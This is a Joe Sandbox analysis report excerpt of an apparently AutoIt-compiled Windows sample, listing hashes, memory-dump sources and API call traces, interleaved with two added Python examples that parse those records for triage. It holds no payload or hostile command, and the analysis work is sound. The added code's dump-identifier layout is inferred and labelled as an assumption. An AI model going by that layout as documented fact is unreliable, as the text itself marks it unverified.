                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: N@
                                                                                              • API String ID: 0-1509896676
                                                                                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction ID: 40dd91083b4d0e5f64814b52a90726d0ff4332c98778e09d09da4c3d75391f0d
                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction Fuzzy Hash: 9341B5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction ID: 9b0e54cccaac0feb62e114293f11873abcceb90e732115ce177d419c788bcec2
                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction Fuzzy Hash: 6A01A4B8A00209EFCB44DF99C5909AEF7F5FF48310F208599D909A7351E770AE41DB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction ID: 238ae73193ba76537cdb47aea0d3327ba3ac5c6879ee3a3372fefe88f0d530c9
                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction Fuzzy Hash: 3A0192B9A00609EFCB44DF99C6909AEF7F5FB48310F208599D919A7701E770AE41DB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
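The Memory Dump Source identifiers above carry more than a file name: their dot-separated fields say which process the dump came from, where the region sat in memory, and how it was mapped. The following is an added example, not Joe Sandbox code. It assumes, as inferred from the identifiers on this page, that the fields are process index, dump stage, dump counter, base address, page protection, an uninterpreted field, region type and module index, with the hexadecimal protection and type values being the Win32 MEMORY_BASIC_INFORMATION constants (PAGE_EXECUTE_READ 0x20 and MEM_IMAGE 0x1000000 for the image dumps, PAGE_EXECUTE_READWRITE 0x40 and MEM_PRIVATE 0x20000 for the dump the report marks "based on PE: false"). It then flags executable regions that no PE image backs, which is where unpacked or injected code normally lives.

```python
"""Decode Joe Sandbox memory-dump identifiers and flag the regions to open first.

Added example, not Joe Sandbox code. Field layout (assumption, inferred from the
identifiers on this page):
    process.stage.dumpid.base.protect.unknown.type.module.sdmp
Base, protect and type are hexadecimal; protect and type match the Win32
MEMORY_BASIC_INFORMATION constants. Fields 6 and 8 are kept but not interpreted.
"""
from dataclasses import dataclass
from typing import Iterable, List

# winnt.h page-protection values (low byte of MEMORY_BASIC_INFORMATION.Protect)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any of the PAGE_EXECUTE* bits

# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_IMAGE, MEM_MAPPED, MEM_PRIVATE = 0x1000000, 0x40000, 0x20000
MEM_TYPE = {MEM_IMAGE: "MEM_IMAGE", MEM_MAPPED: "MEM_MAPPED", MEM_PRIVATE: "MEM_PRIVATE"}


@dataclass(frozen=True)
class DumpRegion:
    process: int
    stage: int
    dump_id: str   # opaque counter, kept verbatim
    base: int
    protect: int
    extra: int     # 6th field, meaning unknown; deliberately not interpreted
    mem_type: int
    module: int    # 8th field, assumed module index (0 when no image backs the region)

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    def is_image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE

    def needs_review(self) -> bool:
        """Executable memory with no PE image behind it: the usual home of
        unpacked or injected code, so the dump to open first."""
        return self.is_executable() and not self.is_image_backed()


def parse_dump_id(name: str) -> DumpRegion:
    stem = name.strip()
    if stem.endswith(".sdmp"):
        stem = stem[: -len(".sdmp")]
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name!r}")
    proc, stage, dump_id, base, protect, extra, mem_type, module = fields
    return DumpRegion(
        process=int(proc, 16),
        stage=int(stage, 16),
        dump_id=dump_id,
        base=int(base, 16),
        protect=int(protect, 16),
        extra=int(extra, 16),
        mem_type=int(mem_type, 16),
        module=int(module, 16),
    )


def regions_to_review(names: Iterable[str]) -> List[DumpRegion]:
    """The dumps worth opening first, lowest base address first."""
    flagged = (r for r in map(parse_dump_id, names) if r.needs_review())
    return sorted(flagged, key=lambda r: r.base)


# Constructed input: four identifiers copied from this report.
SAMPLE_DUMPS = [
    "00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp",
    "00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp",
    "00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp",
    "00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in map(parse_dump_id, SAMPLE_DUMPS):
        print(f"pid#{r.process} base=0x{r.base:08x} {r.protect_name:<24} "
              f"{r.type_name:<12} review={r.needs_review()}")
```

Run over this report's identifiers, only the 0x04735000 region is flagged: PAGE_EXECUTE_READWRITE private memory with no module behind it. The 0x00400000 dumps are the mapped host image, with PAGE_EXECUTE_READ on its code section and read-only or read-write on the rest, which is the normal shape of a loaded PE and the reason the report can say "based on PE: true" for them.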
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(?), ref: 0045953B
                                                                                              • DeleteObject.GDI32(?), ref: 00459551
                                                                                              • DestroyWindow.USER32(?), ref: 00459563
                                                                                              • GetDesktopWindow.USER32 ref: 00459581
                                                                                              • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                              • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                              • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                              • _wcslen.LIBCMT ref: 00459916
                                                                                              • _wcscpy.LIBCMT ref: 0045993A
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                              • GetDC.USER32(00000000), ref: 004599FC
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
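The APIs bullets of a record, like the list just above, are a compact behaviour trace: one line per imported call, with the arguments the analyzer could resolve and the address of the call site. The following is an added example, not Joe Sandbox code. It parses those lines into structured calls (the regular expression is written against the line shape on this page) and runs two heuristics of its own over them: the CreateFileW, ReadFile, CreateStreamOnHGlobal, OleLoadPicture sequence that turns a file on disk into a rendered picture, and a CreateWindowExW whose class name is "AutoIt v3", the window class the AutoIt runtime registers. Note that in this report's rendering the class name is the second argument and the window title the third, which is why "static" appears in the same position for the child controls. The sample input is copied from the record above.

```python
"""Parse the "APIs" bullets of a Joe Sandbox function record and run two
behaviour heuristics over the resulting call list.

Added example, not Joe Sandbox code. The regular expression targets the line
shape on this page; both heuristics are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# "• Name.MODULE(arg,arg,...), ref: ADDR"   or   "• Name.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{1,16})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]   # arguments as printed; "?" means the analyzer could not resolve one
    ref: int                # address of the call site


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m["args"]
    args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
    return ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16))


def parse_api_block(text: str) -> List[ApiCall]:
    """All parseable lines, ordered by call-site address (code order)."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c is not None]
    return sorted(calls, key=lambda c: c.ref)


def in_order(calls: Iterable[ApiCall], *names: str) -> bool:
    """True if every name appears, as a subsequence, in the given order."""
    seq = iter(c.name for c in calls)
    return all(any(seen == n for seen in seq) for n in names)


def loads_picture_from_file(calls: List[ApiCall]) -> bool:
    # file -> HGLOBAL buffer -> IStream -> IPicture: renders an image read from disk
    return in_order(calls, "CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture")


def window_classes(calls: List[ApiCall]) -> List[str]:
    # CreateWindowExW(dwExStyle, lpClassName, lpWindowName, ...): class name is the 2nd argument
    return [c.args[1] for c in calls if c.name == "CreateWindowExW" and len(c.args) > 1]


def findings(calls: List[ApiCall]) -> List[str]:
    out = []
    if loads_picture_from_file(calls):
        out.append("reads a file into a global buffer and renders it via OleLoadPicture")
    for cls in window_classes(calls):
        if cls.lower().startswith("autoit"):
            out.append(f"creates a window of class {cls!r} (AutoIt runtime window class)")
    return out


# Constructed input: eight bullets copied from the record above.
SAMPLE_APIS = """\
• GetDesktopWindow.USER32 ref: 00459581
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• _wcslen.LIBCMT ref: 00459916
"""

if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_APIS)
    for c in parsed:
        print(f"{c.ref:08X} {c.module}!{c.name}({', '.join(c.args)})")
    for f in findings(parsed):
        print("finding:", f)
```

Sorting by call-site address matters for the sequence check: the bullets are already in address order here, but the same check run over several records, or over a list pasted out of order, must not depend on that. The third CreateFileW argument, 80000000, is GENERIC_READ, consistent with the file only being read into the buffer that OleLoadPicture consumes.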
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 4040870279-2373415609
                                                                                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
APIs
• GetSysColor.USER32(00000012), ref: 0044181E
• SetTextColor.GDI32(?,?), ref: 00441826
• GetSysColorBrush.USER32(0000000F), ref: 0044183D
• GetSysColor.USER32(0000000F), ref: 00441849
• SetBkColor.GDI32(?,?), ref: 00441864
• SelectObject.GDI32(?,?), ref: 00441874
• InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
• GetSysColor.USER32(00000010), ref: 004418B2
• CreateSolidBrush.GDI32(00000000), ref: 004418B9
• FrameRect.USER32(?,?,00000000), ref: 004418CA
• DeleteObject.GDI32(?), ref: 004418D5
• InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
• FillRect.USER32(?,?,?), ref: 00441970
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
• String ID:
• API String ID: 69173610-0
• Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
• Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
• Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
• Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
APIs
• DestroyWindow.USER32(?), ref: 004590F2
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetClientRect.USER32(00000000,?), ref: 0045924E
• CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
• GetStockObject.GDI32(00000011), ref: 004592AC
